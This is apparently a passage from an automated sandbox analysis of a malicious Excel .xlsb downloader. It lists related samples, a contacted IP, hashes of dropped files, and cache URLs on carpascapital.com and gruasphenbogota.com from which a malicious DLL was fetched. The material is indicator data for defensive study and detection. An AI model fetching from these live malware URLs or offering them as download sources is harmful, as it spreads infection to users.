                                  887cPpO46m.exe                             malicious  50.116.92.246
                                  Lista degli ordini.exe                     malicious  50.116.92.246
                                  GDiwiEVONn.exe                             malicious  50.116.92.246
                                  L6AaziH5ts.exe                             malicious  50.116.92.246
                                  L6AaziH5ts.exe                             malicious  50.116.92.246
                                  A7DmPhc0bs.exe                             malicious  50.116.92.246
                                  Invoice_634000.html                        malicious  50.116.92.246
                                  Redoslijed na popisu.exe                   malicious  50.116.92.246
                                  LtmQGHQsK1.exe                             malicious  50.116.92.246
                                  plan-930205822.xlsb                        malicious  50.116.92.246
                                  mCzW1o1ZtQ.exe                             malicious  50.116.92.246

The associated samples span executables, HTML pages and Office documents, so this JA3 hash identifies the TLS client stack the analysis host uses (the downloader here is an Excel 4.0 macro calling into Windows, not a custom TLS implementation) rather than the malware family. Treat a JA3 match alone as weak context; the IP and domain overlaps above are the stronger pivots.

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_d6c4e44bbad4515086a963364165f93d4a33398_7a325c51_13ef4904\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 11460
Entropy (8bit): 3.7741173117335585
Encrypted: false
SSDEEP: 192:zzclb6VwcH/RS5uGXx3RjetA/u7saS274ItUt:Pch6VT/RS5n3jeC/u7saX4ItUt
MD5: 15F762162A144362E720C1547D2B9C20
SHA1: 07C57885EBAD5FBAEE82E3A63852A00823C1B542
SHA-256: 2C61000AF99003333633BAFF4D9233C38AA4A4FD5F759920116E3FFD847B89D8
SHA-512: CE261BC172FE673A2BBAC8B4101DD643CF51954747DB7C93D780AE333461D4BEAA41B07D9591407A111F77DACE3E4B307CA5C623E64796ED58422FF4C6B171E0
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.9.0.3.4.3.3.9.2.6.2.4.2.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.8.3.d.b.4.2.-.1.a.3.7.-.4.4.1.4.-.a.2.5.1.-.3.6.0.3.5.8.a.2.0.6.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.c.1.3.a.9.6.-.8.4.0.8.-.4.2.b.b.-.9.5.0.9.-.b.c.d.c.7.b.9.d.1.6.9.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.4.-.0.0.0.0.-.0.0.1.b.-.1.1.f.1.-.b.e.0.b.2.a.6.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_d6c4e44bbad4515086a963364165f93d4a33398_7a325c51_18b8e3a9\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 11464
Entropy (8bit): 3.773207090548546
Encrypted: false
SSDEEP: 192:Gzc1Gb6VrcH/RS5uGXx3RjetA/u7szS274ItU3:Acm6VY/RS5n3jeC/u7szX4ItU3
MD5: B8504E07BB98A9D64FDEFBDF41F194D5
SHA1: 202315861F4D0805683956B4421BEC4844871BA0
SHA-256: C0CA2062F7E533046149967CF764CBB505F0FB7D8FC8D0A9381B4C6665ABA9EF
SHA-512: 1B06CC46BECB26BF63C31F242165B2A634EC8B393F1D3807868E9BF836D7EF05041DBB3230229D1E6E1E17EDF7D8C04BD0884F9B70654046CE863E737B2A77DB
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.9.0.3.4.4.4.4.6.9.9.6.3.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.6.a.1.e.0.b.-.3.0.c.1.-.4.a.2.6.-.9.6.0.2.-.c.c.e.e.6.4.6.7.d.e.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.a.7.8.d.b.4.-.1.9.b.0.-.4.4.6.d.-.a.2.c.d.-.4.f.3.3.7.d.4.9.7.1.8.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.2.c.-.0.0.0.0.-.0.0.1.b.-.3.d.f.c.-.6.5.4.b.2.a.6.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3993.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Thu Jun 24 18:52:20 2021, 0x1205a4 type
Category: dropped
Size (bytes): 34208
Entropy (8bit): 2.6006270724495497
Encrypted: false
SSDEEP: 192:cUNV+FKctFAK58zi/LWHQMW+N8MLOglhcH8xNzudDnn5z:KKGFAK/6H7GuhcHGNyFn5z
MD5: 17AD30916C50EA6F0F1F9B852E3C23C9
SHA1: 88637E18C09D821EE93D7EA5FF68CB8626F4CE01
SHA-256: 6B0849C5A3AA9AE4DFC4207CD1D074A38AE95B467098D2AF1EB18598856BC9F8
SHA-512: 07F1B9B19DDE2E6DEA46B4F48684F482DF33CDBCEB1110BDEA3CFA3F3230AD2CD9B1734F180900257262739769B2EE8A23974C244EA7CA15D270D0341E600CF9
Malicious: false
Preview: MDMP....... .......d..`...................U...........B..............GenuineIntelW...........T...........]..`.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER400C.tmp.WERInternalMetadata.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 8248
Entropy (8bit): 3.69375614707593
Encrypted: false
SSDEEP: 192:Rrl7r3GLNiDP6iQe6YfCSUDgmfJ7Sqx+pBB89begsfaKm:RrlsNir606YaSUDgmfJ7Sqpezfu
MD5: 1830660BB14C11F682D01FDFCB1A65E7
SHA1: 5D37220F3D7049C206092E9D4ECA4BF2CBADCA9C
SHA-256: E8072C1D35E368BEB6A0290D2C072B13C15022330BA27C12B35B650917224032
SHA-512: 1C62B2BBB157F583A8BD9CABFA733D4A3F6006F0B073F94BB5775E7BF07E2D8066EC6519488CC987A0A9517A55A2291CB7C5F267AFC683F75A04E1CBE97A85B7
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER44C1.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4620
Entropy (8bit): 4.450374572187856
Encrypted: false
SSDEEP: 48:cvIwSD8zs1JgtWI9+RaPhWSC8B78fm8M4JkH+FhL+q8VYl+0KJYGgd:uITfPxVSNKJCSkoqYGgd
MD5: A5B1288A547EEE136D2F09E10142DDA9
SHA1: 8B7CBF924B4F1C65A78FA570E69DEFFF5AD42427
SHA-256: C62F43EE967BF8D6F07D6EEE57C605D9C32A91EFAD615D68E00AC26224DBD6B3
SHA-512: 0F6589301777CFD64F231AF020A1FA792B128057814C80992F455F54C7844B7438508A70CCB45A512C46D753E2100852B4B4F336C4C357FC5937C40F3F2CDD3B
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1048563" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD571.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Thu Jun 24 18:54:06 2021, 0x1205a4 type
Category: dropped
Size (bytes): 34060
Entropy (8bit): 2.6074160567654263
Encrypted: false
SSDEEP: 192:PlEZpIjo7oukkDRVlGTtW+N8MLOglhcRuIXZina:twIjWllnlGTnGuhcoUga
MD5: 899EA0F9B3658B5A6CBCDE388DDD87EA
SHA1: E6AE09FDBB78C3574F568F9A66294526E6E07F1D
SHA-256: 85C8876F48013E6696DA42267FA52DB78EB0384C49E73DA89DA49515F50FB894
SHA-512: 2117864D8107504717FC927D62DC45DC6333E43B83C5B4A795C429CF486B7A719681E1716EB038FD8F70A67FF3BFDB2CD4E1056156AADE50E8957167267FB576
Malicious: false
Preview: MDMP....... ..........`...................U...........B..............GenuineIntelW...........T.......,......`.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBDA.tmp.WERInternalMetadata.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 8248
Entropy (8bit): 3.6920438867043095
Encrypted: false
SSDEEP: 192:Rrl7r3GLNiGH6v6YUhSUUgmfJ7Sqx+pBB89b1zsfHnm:RrlsNi26v6YaSUUgmfJ7Sqp1YfG
MD5: 24537AA59C8A9FD673996B251C39DF65
SHA1: 58403CB37FB659C2946440CB15D403F106872780
SHA-256: A84B497332A7DB46AE23866DAC6016EE700E45A3847825CB1A6B2B6B36761922
SHA-512: A181D4B291EEF4D7B7DD194A359384E2F7A7BD490AD891BE0BBB60D125FE0C365EBF984D3C327A59861B09B6CCC227187DE9B573EF3A9663565F8B4FBB9E516C
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE3D.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4620
Entropy (8bit): 4.448979618906682
Encrypted: false
SSDEEP: 48:cvIwSD8zsQJgtWI9+RaPhWSC8By8fm8M4JkH+Fd+q8VYv0KJYkgd:uITfWxVSNRJCik1qYkgd
MD5: DF34FAC632E99E2364AA9BF692327B38
SHA1: 012B4B7C31FC1C326FC6E58EFF056F0D608E41EC
SHA-256: 80B809F00095397594C3B5D4068CD96145C915364638AA1EA2A871BE1D06BDEB
SHA-512: 8855D849B6B56E50B6B4DA1FE66C0B980702FBF0D24BB300B7BF93D6EFA22EAA3626FC9F8730E28854493C9917FC2034850741F815AAD57D48B0865551444C98
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1048564" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\A1BC798F-5F72-4EA3-BE7B-898818256BFB
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 134914
Entropy (8bit): 5.367850460063856
Encrypted: false
SSDEEP: 1536:KcQIKNgeBXA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:GEQ9DQW+zvXO1
MD5: 03B5A85182D5248D0EB0960BC5338E31
SHA1: 09F017611A33578A990E1F714212B2A4158DE7E8
SHA-256: 6843F38B0F450A390FB39DB999FE2896170EEE8F192D282A49A302A97A17BBE9
SHA-512: 14F73A61113E3833D52310E6FFF76CEDD13B2C5600CB8A7792F72041D84F21E045CF9308F5DE81B11A3D96E498E3214301BD612AFE74E17610D844F367EA6395
Malicious: false
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-24T18:51:55">.. Build: 16.0.14222.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7716717F.png
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 1133 x 589, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):75711
                                                                                                                                                              Entropy (8bit):7.915372969602997
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:gxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncT:7br0o45GUgHhX8jC9yST
                                                                                                                                                              MD5:8296338A43942E3107802E3062AC1270
                                                                                                                                                              SHA1:46E67A586ED8A961AF7FD03140547C1CB2BAC227
                                                                                                                                                              SHA-256:BE5F61F2AE8E4C9F9ADBCE5EC33D4C01A331734FFC5818AA8E45CF60456C5ABD
                                                                                                                                                              SHA-512:C2179050A009C990CBFE6EA45E44AA6307AAC938E3EA523D31713F657E09131B07ACEBB31FC353C5A23E7D6323C4EC01736CFF092ACA1D49B58E71A07F1171AD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: .PNG........IHDR...m...M......p......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^......g......q.|.....<...'r....-^..c.If.,ffX1K.[....Z....V.LO5L..J+...z.]]u..>.==.......................Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t......j.7ZP...:...0S....z5T........).WU=j.*.$H.B.P.)l.6Q..'.l..7..k..J.o..._....6..{C...r.|2W.[a...m.BI.?...5......D....4;B...@b.HiP.jfj}@.S9..E.*J...O..BA5.e:...q!.SP....w....(..._.,..I.|a.7+>.........A#......3v..37......w(..j...C.R..H3.f.Q....0....h~...)aM..).vQ.1..+J@Q.....Oa+...!5.e.b...V..|..d../.......vC..&..=9...n.....^6-.tRj...O..{j.e.N....o..~..^.......#!...T...C.#.>.E,[.,......E....h~B.Y./....(2.......(...`....~w#.%..R..{........N.Z....k]8>..dW..^s....U...9...W.e...]...W...i.{u.>.s.,L.>1..)....f..b..Z.nai$.Q.."...W2.......Q...G...z....Ea......
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):302512
                                                                                                                                                              Entropy (8bit):6.5099091174634305
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:EYtPEybzPqbV7WQY6n519eBvQfMN46aCsowDvVJa:TtPZ7qbV7XY6nl8IfMNcCHkv/
                                                                                                                                                              MD5:E1CE7B3C5E793A6C5A2BE7801695DB58
                                                                                                                                                              SHA1:633801464F9C064D6BDE4FA568177872F2354532
                                                                                                                                                              SHA-256:2C93B9A196190AD2E08D31102BEC4FC3AC3B6B732D3B5F6EEF3E1BF5FD017C4B
                                                                                                                                                              SHA-512:5AF5CB784AB47208904D8D00BC5EAE9638779FD48D6EDAC3F74301E729131491AA6F46B5545534389F814FA4E9A8DB2175C5F06948D5E5EA1207249C224C2ABD
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              IE Cache URL:https://carpascapital.com/gBPg8MtsGbv/ka.html
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L...I..`...........!.........&......1a....... ...............................`....................................... ..Q...4R..d....................................................................................R..4............................code............................... ..`.edata..Q.... ......................@..@.rdataf..#...0...$..................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ka[1].htm
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):302521
                                                                                                                                                              Entropy (8bit):6.509780411812991
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:EYtPEybzPqbV7WQY6n519eBvQfMN46aCsowDvVJa:TtPZ7qbV7XY6nl8IfMNcCHkv/
                                                                                                                                                              MD5:35D8C462B24EABCEEB247BF5C6FF07C2
                                                                                                                                                              SHA1:AF7E0EDE0EEB55F094D689E3C493FFAFAFD8A49F
                                                                                                                                                              SHA-256:4ACA6B14EA5A7CD1D61F615D6B0665DA8870981C57DDD10203DD1C2E52D5190B
                                                                                                                                                              SHA-512:56E5E27043E850BEF5ED86419131D2D2100F1A98A58CC68E64325391B96C4D1076F32BAB3D0320F83C0ABC38792AAEB0974E8A5F78ED8F9E1087E150F56378C6
                                                                                                                                                              Malicious:true
                                                                                                                                                              IE Cache URL:https://gruasphenbogota.com/C74hwGGxi/ka.html
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L...I..`...........!.........&......1a....... ...............................`....................................... ..Q...4R..d....................................................................................R..4............................code............................... ..`.edata..Q.... ......................@..@.rdataf..#...0...$..................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\F5C40000
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):113223
                                                                                                                                                              Entropy (8bit):7.875783115355491
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:PKYUOtOpEknvGrnxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncVCd:PKY45br0o45GUgHhX8jC9ySVC
                                                                                                                                                              MD5:E7CDABA9352809BC7F9AECA6A7909863
                                                                                                                                                              SHA1:F2591E410316D5970C33974E1E9B5BEAACEB2955
                                                                                                                                                              SHA-256:212B90AE445DFA7DFE07681DAE33A2BDB4AC75305D6F593C1676731B87F40614
                                                                                                                                                              SHA-512:1C216AD9E63291FB9EBCC2F39161CCF670168E9A34837CC8D74487D65BA24214EFF4DB2C8CAFEACB4B2DD0BF9880712DFB76359AE4E0D08F78442DFE1540B6DD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ...N.1....x...h.EUU..h. .>..>.X.M>....3....U......./....#&2.........U/~..h...2x.6x...I\-.>....a..^.9.R....u!..eH.2......By9.}.*..>..x...;.....z..;..W....W.za\.vyP......h...s..^..jG...u..&.9..#...fz.0.nx1....B.?.1..X....>.uw.P:jq..v4 ..J...E.....$U%...xG...k.ri....oSG1!.j.lWfR.'8*..b|.......L.e>z(....W..@.[.....3.J. .................?N_...X.....".%...W....l.)..W....'r....X.8..@..W..........PK..........!.j.9.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H......
                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):22
                                                                                                                                                              Entropy (8bit):2.9808259362290785
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                              MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                              SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                              SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                              SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                              C:\Users\user\Desktop\~$plan-1053707320.xlsb
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):165
                                                                                                                                                              Entropy (8bit):1.6081032063576088
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                              MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                              SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                              SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                              SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              C:\Users\user\gihi1.dll
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):302512
